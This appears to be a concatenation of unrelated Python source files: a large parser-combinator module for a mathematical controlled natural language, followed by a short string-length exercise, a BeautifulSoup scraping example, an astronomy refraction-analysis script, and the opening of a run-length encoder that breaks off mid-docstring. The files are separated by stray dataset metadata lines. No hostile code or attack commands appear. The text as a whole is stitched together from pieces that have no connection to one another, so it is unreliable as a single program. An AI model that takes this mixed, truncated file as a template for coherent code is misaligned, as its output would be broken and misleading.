return Etok(name='let_annotation_prefix',etoks=(Etok.etok(l),vs),raw=acc)
return (next_word('let') + c.plus_comma(var()) +
next_word('be') + lit('a').possibly() +
next_word('fixed').possibly()).treat(f)
@memo
def let_annotation():
"""Parser for let_annotations. Terminating punctuation not included.
Sample parser inputs:
Let G be a group
Let G be a fixed group
Let (H G : group)
Fix (x : R)
"""
def f1(acc):
return Etok(name='let_annotation',etoks=acc,raw=acc,rule='1')
def f2(acc):
return Etok(name='let_annotation',etoks=acc,raw=acc,rule='2')
def f3(acc):
return Etok(name='let_annotation',etoks=acc,raw=acc,rule='3')
return first(
(first_word( 'fix let') + annotated_vars()).treat(f1,'let_annotation1') ,
(let_annotation_prefix() + general_type()).treat(f2,'let_annotation2') ,
(let_annotation_prefix() + (rawtype|rawprop)).treat(f3,'let_annotation3')
)
@memo
def assumption_prefix():
"""Parser for prefix of assumption.
>>> pstream(assumption_prefix(),'We assume that')
((Etok(LIT,lets,'we'), Etok(LIT,assume,'assume')), LexToken(WORD,'that',1,10))
"""
def f(acc):
return Etok(name='assumption_prefix',etoks=[],raw=acc)
return (
lit('lets') + lit('assume') + next_word('that').possibly()
)
@memo
def assumption():
"""Parser for assumptions in theorems and axioms.
There are two varieties: 'We assume that' or type annotations.
>>> pstream(assumption(),'We assume that BINDER_PROP.')
Etok(assumption,'we assume that BINDER_PROP .')
"""
def f(acc):
((_,s),_)=acc
return Etok(name='assumption',etoks=[s],raw=acc)
def f2(acc):
(l,_)=acc
return Etok.rawupdate(l,acc)
pre = lit('lets') + lit('assume')
pre2 = first_word('let fix')
return first((assumption_prefix() + statement() + period).commit(pre).treat(f,'assumption') ,
(let_annotation() + period).commit(pre2).treat(f2,'assumption')
)
@memo
def axiom():
"""Parser for axioms and other statements without proof.
We need unambiguous lines between assumptions and claims.
'Then' and 'Moreover' always belong to claims.
Sentences starting with let, fix, assumption_prefix are assumptions.
>>> pstream(axiom(),'Conjecture. We assume that BINDER_PROP. Then BINDER_PROP.')
Etok(axiom,'conjecture . we assume that BINDER_PROP . then BINDER_PROP .')
"""
def f(acc):
(((((_,aa),_),s),_),ms) = acc
ms = [s for ((_,s),_) in ms]
return Etok(name='axiom',etoks=(aa,[s]+ms),raw=acc)
return (
decl_label('axiom') + assumption().many() +
then_prefix() + statement() + period +
(next_word('moreover') + statement() + period).many()
).treat(f,'axiom')
@memo
def theorem():
"""Parser for theorem and proof.
>>> pstream(theorem(),'Theorem 1. AFFIRM_PROOF')
Etok(theorem,'theorem 1 . AFFIRM_PROOF')
"""
def f(acc):
((_,aa),p)=acc
return Etok(name='theorem',etoks=(aa,p),raw=acc)
return (decl_label('theorem') + assumption().many() +
get_lookup_parse('affirm_proof')).treat(f,'theorem')
@memo
def nonkey(): #was not_banned
keyword = [
'is','be','are','denote','define','enter','namespace','stand',
'if','iff','inferring','the','a','an','we','say','write',
'assume','suppose','let','said','defined','or','fix','fixed'
]
def p(token):
return not(c.singularize(token.value) in keyword)
return c.next_type(['VAR','WORD','ATOMIC_IDENTIFIER']).if_test(p)
@memo
def any_controlseq(): #was controlseq
r"""
>>> pstream(any_controlseq(),r'\include')
Etok(CONTROLSEQ,\include,'\include')
"""
return c.next_type('CONTROLSEQ').treat(Etok.etok)
def controlseq(s): #was the_controlseq
"""Parser for a particular control sequence 's'.
s includes the backslash."""
return any_controlseq().if_value(s)
# PROOFS
class Proof_step:
"""Parser constructors for proof steps
Everything in this class is non-recursive in terms of
the lookup 'proof_script' 'affirm_proof'
"""
def kill(acc):
"""Currently proof statements are not being
saved into the AST. Parse then discard."""
return Etok(name='proof-step',etoks=[],raw=acc)
def canned_prefix():
"""
>>> pstream(Proof_step.canned_prefix(),'Of course, it is trivial to see,')
Etok(proof-step,'of course , it is trivial to see ,')
"""
# debug need slice [0::2]
return (c.plus_andcomma(phrase_list_transition()) +
comma.possibly()
).treat(Proof_step.kill,'canned_prefix')
def canned():
"""parser for canned proof statements
>>> pstream(Proof_step.canned(),'The proof is routine')
Etok(proof-step,'the proof is routine')
>>> pstream(Proof_step.canned(),'The corollary follows')
Etok(proof-step,'the corollary follow')
"""
return first(next_phrase("we proceed as follows") ,
(next_word('the') +
first_word('result lemma theorem proposition corollary') +
next_word('now').possibly() +
next_word('follows')) ,
next_phrase('the other cases are similar') ,
(next_phrase('the proof is')+ first_word('obvious trivial easy routine'))).treat(Proof_step.kill,'canned')
def ref_item():
"""
>>> pstream(Proof_step.ref_item(),'theorem 33')
Etok(proof-step,'theorem 33')
"""
return c.plus_andcomma(read_keyword('location').possibly() + atomic()).treat(Proof_step.kill,'ref_item')
def by_ref():
"""
>>> pstream(Proof_step.by_ref(),'(by Theorem 1)')
Etok(proof-step,'( by theorem 1 )')
"""
return c.paren(next_word('by') + Proof_step.ref_item()).possibly().treat(Proof_step.kill,'by_ref')
def by_method():
"""
menhir/ocaml doc describes an ambiguity here.
        I'm hoping it goes away now that plain_term is implemented.
>>> pstream(Proof_step.by_method(),'by induction on TDOP_TERM. ')
Etok(proof-step,'by induction on TDOP_TERM')
"""
return (next_word('by') +
(first_phrase(['contradiction','case analysis']) |
(next_word('induction') +
(next_word('on') + plain_term()).possibly()) +
(next_word('that')| period).probe()).name('post_by_method')
).treat(Proof_step.kill,'by_method')
def choose_prefix():
"""
>>> pstream(Proof_step.choose_prefix(),'We choose')
Etok(proof-step,'we choose')
"""
return (then_prefix() + lit('lets').possibly() + lit('choose')).treat(Proof_step.kill,'choose_prefix')
def opt_proof():
return get_lookup_parse('proof_script').possibly().treat(Proof_step.kill,'opt_proof')
def choose():
"""
>>> pstream(Proof_step.choose(),'We choose x and y.')
Etok(proof-step,'we choose x and y .')
"""
return (Proof_step.choose_prefix() + c.plus_andcomma(pseudoterm()) +
Proof_step.by_ref() + period +
Proof_step.opt_proof()
).treat(Proof_step.kill,'choose')
def proof_preamble():
"""
>>> pstream(Proof_step.proof_preamble(),'Proof by contradiction.')
Etok(proof-step,'proof by contradiction .')
"""
return first(
(next_word('proof') + Proof_step.by_method().possibly() + period) ,
next_word('indeed')
).treat(Proof_step.kill,'proof_preamble')
def goal_prefix():
"""
>>> pstream(Proof_step.goal_prefix(),'We prove that ...')
Etok(proof-step,'we prove that')
"""
return first((lit('lets').possibly() + lit('prove') + next_word('that')) ,
(Proof_step.by_method() + next_word('that')).possibly()
).treat(Proof_step.kill,'goal_prefix')
def goal_proof():
"""
>>> pstream(Proof_step.goal_proof(),'We prove that it is wrong that STATEMENT (by theorem 3). proof_script ...')
Etok(proof-step,'we prove that it is wrong that STATEMENT ( by theorem 3 ) . proof_script')
"""
return (Proof_step.goal_prefix() + statement() + Proof_step.by_ref() + period +
get_lookup_parse('proof_script')
).treat(Proof_step.kill,'goal_proof')
def statement_proof():
return (then_prefix() + statement() + Proof_step.by_ref() + period +
(next_word('moreover') + statement() + Proof_step.by_ref() + period).many()
).treat(Proof_step.kill,'statement_proof')
def case():
"""
>>> pstream(Proof_step.case(),'Case it is wrong that STATEMENT.')
Etok(proof-step,'case it is wrong that STATEMENT .')
"""
return (next_word('case') + statement() + period + Proof_step.opt_proof()
).treat(Proof_step.kill,'case')
def proof_body():
"""Forthel prohibits the last proof-body in a proof
from being an assumption. We do not prohibit this.
"""
return first(
assumption() ,
Proof_step.canned() ,
Proof_step.case() ,
Proof_step.choose() ,
get_lookup_parse('affirm_proof')
).treat(Proof_step.kill,'proof_body')
@memo
def affirm_proof():
return first(c.lazy_call(Proof_step.statement_proof) ,
c.lazy_call(Proof_step.goal_proof))
@memo
def proof_script():
return (Proof_step.proof_preamble() +
c.lazy_call(Proof_step.proof_body).plus() +
lit('qed') + period
)
# patterns
pattern_key = ["is","be","are","denote","define"
"enter","namespace",
"stand","if","iff","inferring","the","a","an",
"we","say","write",
"assume","suppose","let",
"said","defined","or","fix","fixed" # and (need in 'resultant of f and g')
]
class Pattern:
"""Parser generators for patterns"""
def word_nonkey():
"""Parser for any WORD token except for keywords."""
return c.next_any_word_except(pattern_key).treat(Etok.etok).name('word_nonkey')
def word_extended():
"""parser for 'word (or word) (word pattern)'.
words cannote be key words
(or word) gives a synonym as a parenthetical.
(word pattern) is an optional recursive word pattern.
>>> pstream(Pattern.word_extended(),'unsupported (or empty) (WORD_PATTERN)')
Etok(word_extended,'unsupported ( or empty ) ( WORD_PATTERN )')
"""
def f(acc):
((w,o),wp)=acc
if o:
(_,(_,o),_)=o
            wp = [w for (_,w,_) in wp]
return Etok('word_extended',etoks=(w,wp,o),raw=acc)
return (Pattern.word_nonkey() +
c.paren(next_word('or') + Pattern.word_nonkey()).possibly() +
c.paren(get_lookup_parse('word_pattern')).many()
).treat(f,'word_extended')
def words_extended():
return Pattern.word_extended().plus()
def _var():
"""parser for a variable appearing in a pattern
>>> pstream(Pattern._var(),'x')
Etok(VAR,x,'x')
"""
return var() | annotated_var()
def word_pattern():
"""Parser for an (extended) word pattern,
starting with an (extended) word.
Extended words appear in even positions and
variables appear in odd positions.
>>> pstream(Pattern.word_pattern(),'integrable with respect to x')
Etok(word_pattern,'integrable with respect to x')
"""
def f(acc):
((w,vws),v)=acc
vws = [w]+vws
if v:
vws = lib.fflatten(vws + [v])
return Etok('word_pattern',etoks=vws,raw=acc)
return (Pattern.words_extended() +
(Pattern._var() + Pattern.words_extended()).many() +
Pattern._var().possibly()).treat(f,'word_pattern')
def type_word_pattern():
def f(acc):
(_,wp)=acc
return wp
return (lit('a').possibly() + Pattern.word_pattern()).treat(f,'type_word_pattern')
def function_word_pattern():
def f(acc):
(_,wp)=acc
return wp
return (next_word('the') + Pattern.word_pattern()).treat(f,'function_word_pattern')
def notion_pattern():
def f(acc):
(((v,_),_),wp)=acc
return Etok('notion_pattern',etoks=(v,wp),raw=acc)
return (Pattern._var() + next_word('is') + lit('a') +
Pattern.word_pattern()
).treat(f,'notion_pattern')
def adjective_pattern():
"""
profile ('adjective_pattern' ('var','word_pattern'))
"""
def f(acc):
(((v,_),_),wp)=acc
return Etok('adjective_pattern',etoks=(v,wp),raw=acc)
return (Pattern._var() + next_word('is') +
next_word('called').possibly() +
Pattern.word_pattern()
).treat(f,'adjective_pattern')
def var_multisubsect_pattern():
"""
Debug: The variables in a multisubject must have the same type.
"""
def f1(acc):
((v1,_),v2)=acc
return Etok(name='var_multisubject_pattern',etoks=(v1,v2,None),raw=acc)
def f2(acc):
(_,(((v1,_),v2),o),_)=acc
return Etok(name='var_multisubject_pattern',etoks=(v1,v2,o),raw=acc)
return first(
(Pattern._var() + comma +
Pattern._var()).treat(f1,'var_multisubject_pattern') ,
c.paren(Pattern._var() + comma + Pattern._var() +
opt_colon_type()).treat(f2,'var_multisubject_pattern')
)
def adjective_multisubject_pattern():
def f(acc):
(((v,_),_),w)=acc
return Etok('adjective_multisubject_pattern',etoks=(v,w),raw=acc)
return (
Pattern.var_multisubsect_pattern() + next_word('are') +
next_word('called').possibly() + Pattern.word_pattern()
).treat(f,'adjective_multisubject_pattern')
def verb_pattern():
def f(acc):
return Etok('verb_pattern',etoks=acc,raw=acc)
return (Pattern._var() + Pattern.word_pattern()).treat(f,'verb_pattern')
def verb_multisubject_pattern():
def f(acc):
return Etok('verb_multisubject_pattern',etoks=acc,raw=acc)
return (Pattern.var_multisubsect_pattern() +
Pattern.word_pattern()).treat(f,'verb_multisubject_pattern')
def predicate_word_pattern():
return first(
Pattern.notion_pattern() ,
Pattern.adjective_pattern() ,
Pattern.adjective_multisubject_pattern() ,
Pattern.verb_pattern() ,
Pattern.verb_multisubject_pattern()
).name('predicate_word_pattern')
def controlseq_pattern():
r"""
>>> pstream(Pattern.controlseq_pattern(),r'\tie {x} {y} [z]')
Etok(controlseq_pattern,'\tie { x } { y }')
"""
def f(acc):
(a,vs)=acc
vs = [v for (_,v,_) in vs]
return Etok('controlseq_pattern',etoks=(a,vs),raw=acc)
return (
any_controlseq() + c.brace(Pattern._var()).many()
).treat(f,'controlseq_pattern')
def binary_controlseq_pattern():
def f(acc):
((v,c),v2)=acc
return Etok('binary_controlseq_pattern',etoks=(v,c,v2),raw=acc)
return (
Pattern._var() + Pattern.controlseq_pattern() + Pattern._var()
).treat(f,'binary_controlseq_pattern')
def identifier_pattern():
def f(acc):
return Etok('identifier_pattern',etoks=acc,raw=acc)
return first(
(identifier() + args_template()) ,
(c.next_type('BLANK').treat(Etok.etok) + args_template())
).treat(f)
def precedence_level(): #was paren_precedence_level
"""parser for the precedence level.
output: (INTEGER,ASSOC), where ASSOC in ['left','right','no'].
integer conversion is not performed.
>>> pstream(Pattern.precedence_level(),'with precedence 10 and left associativity ...')
Etok(precedence_level,'with precedence 10 and left associativity')
"""
def f(acc):
(_,((_,i),a),_) =acc
if a:
((_,a),_)=a
return Etok('precedence_level',etoks=(i,a),raw=acc)
return c.opt_paren(
(next_phrase('with precedence') + c.next_type('INTEGER').treat(Etok.etok)) +
(next_word('and') + read_keyword('assoc').treat(Etok.etok) + next_word('associativity')).possibly()
).treat(f,'precedence_level')
def get_precedence_level(e):
"""helper function that computes the precedence of Etok e
as integer,assoc"""
(i,a)=e.etoks
i = int(i)
if not(a):
return (i,'no')
return (i,c.getvalue(a))
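    # Illustrative readings of get_precedence_level (an added note):
    #   'with precedence 10 and left associativity' -> (10, 'left')
    #   'with precedence 10'                        -> (10, 'no')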
def any_symbol(): # was symbol
return first(
c.next_type('SYMBOL').treat(Etok.etok) ,
Pattern.controlseq_pattern()
)
def symbol(s): # was the_symbol
return c.next_type('SYMBOL').if_value(s).treat(Etok.etok)
def symbol_pattern():
"""Parser for general symbol pattern. Alternating S/V.
At least one symbol appears, but possibly no variables.
V? S (VS)* V? where V=var, S=symbol.
        The symbols can occupy either even or odd positions.
>>> pstream(Pattern.symbol_pattern(),'x ## y ## z')
Etok(symbol_pattern,'x ## y ## z')
>>> pstream(Pattern.symbol_pattern(),'x ## y ## z with precedence 5')
Etok(symbol_pattern,'x ## y ## z with precedence 5')
"""
def f(acc):
((((v1,s1),vs),v2),p)=acc
vs = [s1]+vs
if v1:
vs = [v1]+vs
if v2:
vs = vs + [v2]
return Etok('symbol_pattern',etoks=(vs,p),raw=acc)
return (
Pattern._var().possibly() + Pattern.any_symbol() +
(Pattern._var() + Pattern.any_symbol()).many() +
Pattern._var().possibly() + Pattern.precedence_level().possibly()
).treat(f,'symbol_pattern')
def binary_symbol_pattern():
"""Parser for binary symbol pattern.
VSV (V=var, S=symbol)
Special case of symbol_pattern.
>>> pstream(Pattern.binary_symbol_pattern(),'x ^^ y with precedence 10 and right associativity')
Etok(binary_symbol_pattern,'x ^^ y with precedence 10 and right associativity')
>>> pstream(Pattern.binary_symbol_pattern(),'x ## y')
Etok(binary_symbol_pattern,'x ## y')
"""
def f(acc):
((v,s),v2)=acc
return Etok('binary_symbol_pattern',etoks=(v,s,v2),raw=acc)
return (
Pattern._var() + Pattern.any_symbol() + Pattern._var() +
Pattern.precedence_level().possibly()
).treat(f,'binary_symbol_pattern')
class Macro:
def in_section():
"""Parser for in-section scoping.
>>> pstream(Macro.in_section(),'In this section,')
Etok(in_section,'in this section ,')
Output:
Etok whose value is the location keyword.
"""
def f(acc):
((_,d),_)=acc
return Etok(name='in_section',etoks=[d],raw=acc)
return (next_phrase('in this') + read_keyword('doc') +
comma.possibly()).treat(f,'in_section')
#def we_record_def_deprecated():
# """Parser for registered facts.
def copula():
"""Parser for copula in macro declarations.
>>> pstream(Macro.copula(),'is defined as')
Etok(copula,'is defined as')
"""
def f(acc):
return Etok('copula',etoks=[],raw=acc)
return first(
(lit('is') + lit('defined_as').possibly()) ,
(next_value(':=')) ,
(lit('denote'))
).treat(f,'copula')
def function_copula():
"""Parser for function_copula with possible type annotation
>>> pstream(Macro.function_copula(),': POST_COLON_TYPE := ...')
Etok(function_copula,': POST_COLON_TYPE :=')
"""
def f2(acc):
(o,_)=acc
return Etok(name='function_copula',etoks=[o],raw=acc)
return first(
Macro.copula() ,
(opt_colon_type() + next_value(':=')).treat(f2,'function_copula')
)
def iff_junction():
return lit('iff')
def opt_say():
"""
>>> pstream(Macro.opt_say(),'We say')
Etok(LIT,we-say,'we say')
"""
return lit('we-say').possibly()
#def opt_record_deprecated():
# return lit('we-record').possibly()
def opt_define():
"""
>>> pstream(Macro.opt_define(),'Let us define ...')
Etok(opt_define,'let us define')
"""
def f(acc):
return Etok('opt_define',etoks=[],raw=acc)
return (
(lit('lets') + next_word('define').possibly()) # |
#Macro.opt_record()
).treat(f,'opt_define')
#def macro_inferring():
def classifier_word_pattern(): # was classifier_words
def f(acc):
return Etok(name='classifier_word_pattern',etoks=acc[0::2],raw=acc)
return (
c.plus_andcomma(c.next_any_word_except(['is','are','be']).treat(Etok.etok))
).treat(f,'classifier_word_pattern')
def classifier_def():
"""Parser for defining classifiers.
profile: ('classifier_word_pattern' 'WORD'*)
>>> pstream(Macro.classifier_def(),'Let function, symbol, object be classifiers')
Etok(classifier_word_pattern,'let function , symbol , object be classifier')
"""
def f(acc):
((((_,w),_),_),_)=acc
return Etok.rawupdate(w,acc)
return (
next_word('let') + Macro.classifier_word_pattern() +
lit('is') + lit('a').possibly() + next_word('classifier')
).treat(f,'classifier_def')
def type_head():
"""
Parser for the LHS pattern of a type def.
The symbol pattern has fixed precedence, right assoc
"""
return first(
Pattern.symbol_pattern() ,
Pattern.type_word_pattern() ,
Pattern.identifier_pattern() ,
Pattern.controlseq_pattern()
)
def type_def():
"""
Parser for a type definition.
>>> pstream(Macro.type_def(),'We define x ## y : Type to be TIGHTEST_TYPE')
Etok(type_def,'we define x ## y : type to be TIGHTEST_TYPE')
>>> pstream(Macro.type_def(),'We define x ## y to be the type TIGHTEST_TYPE')
Etok(type_def,'we define x ## y to be the type TIGHTEST_TYPE')
"""
def f1(acc):
((((((_,h),_),_),_),_),t)=acc
return Etok('type_def',etoks=(h,t),raw=acc)
def f2(acc):
((((_,h),_),_),t)=acc
return Etok('type_def',etoks=(h,t),raw=acc)
"""Parser for a type definition"""
return first(
(Macro.opt_define() + Macro.type_head() + colon + rawtype +
Macro.copula() + lit('a').possibly() + general_type()).treat(f1,'type_def') ,
(Macro.opt_define() + Macro.type_head() + Macro.copula() +
c.next_phrase('the type') + general_type()).treat(f2,'type_def')
)
def function_head():
"""
Parser for the LHS pattern of a function def.
"""
return first(
Pattern.function_word_pattern() ,
Pattern.symbol_pattern() ,
Pattern.identifier_pattern()
)
def function_def():
"""
Parser for function definitions.
>>> pstream(Macro.function_def(),'We define x ## y := the PRIM_DEFINITE_NOUN')
Etok(function_def,'we define x ## y := the PRIM_DEFINITE_NOUN')
"""
def f(acc):
#return acc
(((((_,h),_),_),p))=acc
return Etok('function_def',etoks=(h,p),raw=acc)
return (
Macro.opt_define() + Macro.function_head() +
Macro.function_copula() + lit('equal').possibly() +
#next_word('the').possibly() + N.B. plain_definite_noun includes 'the' already
plain_term()
).treat(f,'function_def')
def predicate_head():
"""Parser for the LHS pattern of a predicate def"""
return first(
Pattern.identifier_pattern() , #before word pattern
Pattern.predicate_word_pattern() ,
Pattern.symbol_pattern()
)
def predicate_def():
"""Parser for predicate definitions
>>> pstream(Macro.predicate_def(),'We write x >> y iff it is wrong that STATEMENT')
Etok(predicate_def,'we write x >> y iff it is wrong that STATEMENT')
"""
def f(acc):
(((_,h),_),s)=acc
return Etok('predicate_def',etoks=(h,s),raw=acc)
return (
Macro.opt_say() + Macro.predicate_head() +
Macro.iff_junction() + statement()
).treat(f,'predicate_def')
def binder_def():
"""Parser for definition of new binders (quantifiers)
>>> pstream(Macro.binder_def(),'Let the binder ## (x : POST_COLON_TYPE), P denote it is wrong that STATEMENT ')
Etok(binder_def,'let the binder ## ( x : POST_COLON_TYPE ) , P denote it is wrong that STATEMENT')
"""
def f(acc):
((((((_,s),(_,(v,t),_)),_),v2),_),p)=acc
return Etok('binder_def',etoks=(s,v,t,v2,p),raw=acc)
return (
next_phrase('let the binder') + Pattern.any_symbol() +
c.paren(var() + opt_colon_type()) +
comma + var() +
lit('denote') + statement()
).treat(f,'binder_def')
def definition_statement():
"""Parser for classifier, type, function, predicate defs
"""
return first(
Macro.classifier_def() ,
Macro.type_def() ,
Macro.function_def() ,
Macro.predicate_def()
)
def definition_affirm():
"""Definition + period"""
def f(acc):
(d,_)=acc
return Etok.rawupdate(d,acc)
return (Macro.definition_statement() + period).treat(f,'definition_affirm')
def definition_label():
"""
>>> pstream (Macro.definition_label(),'Definition XX.')
Etok(definition_label,'definition XX .')
"""
def f(acc):
((_,l),_) = acc
return Etok(name='definition_label',etoks=l,raw=acc)
return (lit('def') + label().possibly() + period).treat(f,'definition_label')
def definition():
"""
Main parser for definitions.
        Disambiguation:
        Predicates use iff_junction.
        identifier patterns start with an identifier.
        predicate word patterns contain words.
        binary symbol patterns start with a tvar, then a symbol.
        Functions use the copula.
        word patterns start with LIT_THE word ...
        symbol patterns contain a symbol or CONTROLSEQ.
        identifier patterns start with an identifier.
        Types use the copula.
        type_def is distinguished from function_def by COLON ID_TYPE
        before the copula.
>>> pstream(Macro.definition(),'Definition XX. We say x >> y iff it is wrong that STATEMENT.')
Etok(definition,'definition XX . we say x >> y iff it is wrong that STATEMENT .')
"""
def f(acc):
((p,a),d)=acc
return Etok('definition',etoks=(p,a,d),raw=acc)
return (
Macro.definition_label() + assumption().many() +
Macro.definition_affirm()
).treat(f,'definition')
def macro_body():
"""Parser for macro classifier, type, function def,
let annotation, etc."""
return first(
Macro.classifier_def() ,
Macro.type_def() ,
Macro.function_def() ,
Macro.predicate_def() ,
let_annotation() ,
Macro.binder_def()
# record_def
# enter_namespace
)
def macro():
"""A macros are like definitions, but they
can have local scope, they can be chained,
they include binder defs and let annotations,
and they does not have a label.
Macros are expanded immediately, but definitions
create a new constant and are not expanded.
The expansion of a macro must be a plain_term,
but a definition may contain bound variables.
>>> pstream(Macro.macro(),'In this section, we write x << y iff it is wrong that STATEMENT.')
Etok(macro,'in this section , we write x << y iff it is wrong that STATEMENT .')
"""
sep = semicolon + next_word('and').possibly()
def f(acc):
((s,b),_)=acc
return Etok('macro',etoks=(s,b[0::2]),raw=acc)
return (
Macro.in_section().possibly() +
Macro.macro_body().plus(sep) + period
).treat(f,'macro')
@memo
def declaration():
"""Parser for axiom, definition, or theorem
"""
return first(
theorem() ,
axiom() ,
Macro.definition()
)
@memo
def utterance():
"""A text item is a major block of texts
in a document.
Every item must end with a period or be an
instruction in [].
"""
return first(
section_label() ,
# not implemented. namespace() ,
Instruction.instruction() ,
synonym_item() ,
declaration() ,
Macro.macro() ,
inductive_decl() ,
mutual_inductive_decl_item() ,
mutual_inductive_def_item() ,
satisfy_item()
)
@memo
def text():
"""Parse a sequence of utterance
Normally, we work at the level of utterances,
processing each in turn, before moving to the next.
The text Parser skips the processing.
"""
return utterance().many() + lit('done').possibly()
@memo
def program_text():
return text() + Parse.finished()
# initialize lookup tables
def _add_prim1():
def equal():
return next_value('=').treat(Etok.etok)
add_lookup_parse('prim_binary_relation_op',equal())
def bool():
return (rawtrue | rawfalse)
add_lookup_parse('prim_relation', bool().name('prim_relation','True-False'))
pass
_add_prim1()
lookup = {
'affirm_proof':affirm_proof,
'alt_term': alt_term,
'binder_prop': binder_prop,
'delimited_term':delimited_term,
'does_pred':does_pred,
'general_type':general_type,
'head_statement':head_statement,
'is_pred':is_pred,
'opentail_term':opentail_term,
'plain_term':plain_term,
'post_colon_type':post_colon_type,
'proof_script':proof_script,
'prop':prop,
'pseudoterm':pseudoterm,
'sort_expr':sort_expr,
'statement':statement,
'tdop_term':tdop_term,
'term':term,
'tightest_expr':tightest_expr,
'word_pattern':Pattern.word_pattern,
}
def _init_lookup_parse():
for s in {}:
add_lookup_parse(s,c.lazy_call(lookup[s]))
_init_lookup_parse()
if __name__ == "__main__":
import doctest
doctest.testmod(optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE)
| 2.765625 | 3 |
exeSemana5.py | SricardoSdSouza/Curso-da-USP | 0 | 12759609 | ''''
def multiplica(a,b):
return a*b
print(multiplica(4,5))
def troca(x,y):
aux = x
x=y
y=aux
x=10
y=20
troca(x,y)
print("X=",x,"e y =",y)
'''
def total_caracteres(x, y, z):
    return len(x) + len(y) + len(z)
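# Illustrative usage (an addition, not in the original file):
print(total_caracteres("a", "bb", "ccc"))  # 6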
| 3.453125 | 3 |
scraping.py | Pragati-02/Web-Scraping | 0 | 12759610 | <reponame>Pragati-02/Web-Scraping<gh_stars>0
import requests
from bs4 import BeautifulSoup
r = requests.get("https://pythonizing.github.io/data/example.html", headers={'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'})
c = r.content
# print (c)
soup = BeautifulSoup(c, "html.parser")
# print(soup.prettify())
div_content = soup.find_all("div", {"class":"cities"})
# print(div_content[0])
# print(div_content[2])
h2_text = div_content[0].find_all("h2")[0].text
# print(h2_text)
for item in div_content:
print(item.find_all("h2")[0].text)
for item in div_content:
print(item.find_all("p")[0].text)
| 3.453125 | 3 |
kai/reduce/test_dar.py | skterry/KAI | 1 | 12759611 | from pyraf import iraf
import glob, os
import numpy as np
import pylab as py
import math, datetime
import pyfits
from gcwork import objects
from . import dar
def diffDarOnOff(cleanDir1, cleanDir2):
files1tmp = glob.glob(cleanDir1 + '/c????.fits')
files2tmp = glob.glob(cleanDir2 + '/c????.fits')
for f1 in files1tmp:
cname1 = f1.split('/')[-1]
for f2 in files2tmp:
cname2 = f2.split('/')[-1]
if (cname1 == cname2):
outname = cname1.replace('c', 'diff')
print('IMARITH: %s - %s = %s' % (cname1, cname2, outname))
if (os.path.exists(outname)):
iraf.imdelete(outname)
iraf.imarith(f1, '-', f2, outname)
def plotScalePosangOverNight(alignRoot, imgDir):
# Read in the list of images used in the alignment
listFile = open(alignRoot+'.list', 'r')
parang = []
for line in listFile:
_data = line.split()
lisFile = _data[0].split('/')[-1]
if (lisFile.startswith('mag')):
continue
fitsFile = imgDir + lisFile.split('_')[0] + '.fits'
# Get header info
hdr = pyfits.getheader( fitsFile )
parang.append( hdr['PARANG'] )
parang = np.array(parang)
numEpochs = len(parang)
# Load scales/angles
scale = np.zeros(numEpochs, float)
angle = np.zeros(numEpochs, float)
sgrax = np.zeros(numEpochs, float)
sgray = np.zeros(numEpochs, float)
scaleErr = np.zeros(numEpochs, float)
angleErr = np.zeros(numEpochs, float)
sgraxErr = np.zeros(numEpochs, float)
sgrayErr = np.zeros(numEpochs, float)
imgPA = np.zeros(numEpochs, float)
for e in range(numEpochs):
trans = objects.Transform()
trans.loadFromAbsolute(root='./', align=alignRoot + '.trans', idx=e+1)
trans.linearToSpherical(silent=1, override=False)
scale[e] = trans.scale
angle[e] = math.degrees(trans.angle)
scale *= 9.96
py.clf()
py.subplot(2, 1, 1)
py.plot(parang, scale, 'k.')
py.ylabel('Plate Scale (mas/pix)')
py.xlabel('Parallactic Angle (deg)')
py.title('Relative Transformation')
py.subplot(2, 1, 2)
py.plot(parang, angle, 'k.')
py.ylabel('Position Angle (deg)')
py.xlabel('Parallactic Angle (deg)')
py.savefig('plots/scale_pa_vs_parang.png')
def plotDarCoeffsVsZenith():
effWave = 2.12 # microns
utc = datetime.datetime(2008, 6, 15, 0, 0, 0)
utc2hst = datetime.timedelta(hours=-10)
hst = utc + utc2hst
(refA, refB) = dar.keckDARcoeffs(effWave, hst.year, hst.month, hst.day,
hst.hour, hst.minute)
elevation = np.arange(30.0, 90.0, 1.0)
tanz = np.tan((90.0 - elevation) * math.pi / 180.0)
tmp = 1.0 + tanz**2
darCoeffL = tmp * (refA + 3.0 * refB * tanz**2)
darCoeffQ = -tmp * (refA*tanz +
3.0 * refB * (tanz + 2.0*tanz**3))
# Convert DAR coefficients for use with arcseconds
darCoeffL *= 1.0
darCoeffQ *= 1.0 / 206265.0
# 1" sep
linear1 = darCoeffL * 1.0 * 10**3 # in mas
quadra1 = darCoeffQ * 1.0**2 * 10**3 # in mas
# 10" sep
linear2 = darCoeffL * 10.0 * 10**3 # in mas
quadra2 = darCoeffQ * 10.0**2 * 10**3 # in mas
# 60" sep
linear3 = darCoeffL * 60.0 * 10**3 # in mas
quadra3 = darCoeffQ * 60.0**2 * 10**3 # in mas
    print(' Linear(mas) Quadratic(mas)')
print('1" sep %12.7f %12.7f' % (linear1.mean(), quadra1.mean()))
print('10" sep %12.7f %12.7f' % (linear2.mean(), quadra2.mean()))
print('60" sep %12.7f %12.7f' % (linear3.mean(), quadra3.mean()))
py.clf()
py.semilogy(elevation, linear1, 'r-')
py.semilogy(elevation, -quadra1, 'r--')
py.semilogy(elevation, linear2, 'b-')
py.semilogy(elevation, -quadra2, 'b--')
py.semilogy(elevation, linear3, 'g-')
py.semilogy(elevation, -quadra3, 'g--')
py.legend(('1" lin', '1" quad',
'10" lin', '10" quad', '60" lin', '60" quad'), loc='lower left')
py.xlabel('Elevation (deg)')
py.ylabel('Delta-R (mas)')
py.savefig('dar_linear_vs_quad_terms.png')
py.savefig('dar_linear_vs_quad_terms.eps')
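# Illustrative helper (an addition, not in the original module): evaluate
# the same linear and quadratic DAR coefficients at a single elevation.
# refA/refB are assumed to come from dar.keckDARcoeffs, as above; the
# quadratic term is divided by 206265 for use with arcseconds.
def dar_coeffs_at_elevation(refA, refB, elevation_deg):
    tanz = math.tan(math.radians(90.0 - elevation_deg))
    tmp = 1.0 + tanz**2
    coeffL = tmp * (refA + 3.0 * refB * tanz**2)
    coeffQ = -tmp * (refA * tanz + 3.0 * refB * (tanz + 2.0 * tanz**3)) / 206265.0
    return coeffL, coeffQ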
| 2.109375 | 2 |
assignments/solutions/11_run_length/rle.py | zchen1-ua/be434-fall-2021 | 0 | 12759612 | #!/usr/bin/env python3
def encode(message):
    """Run-length encode a string: each maximal run of a repeated
    character becomes its count followed by the character,
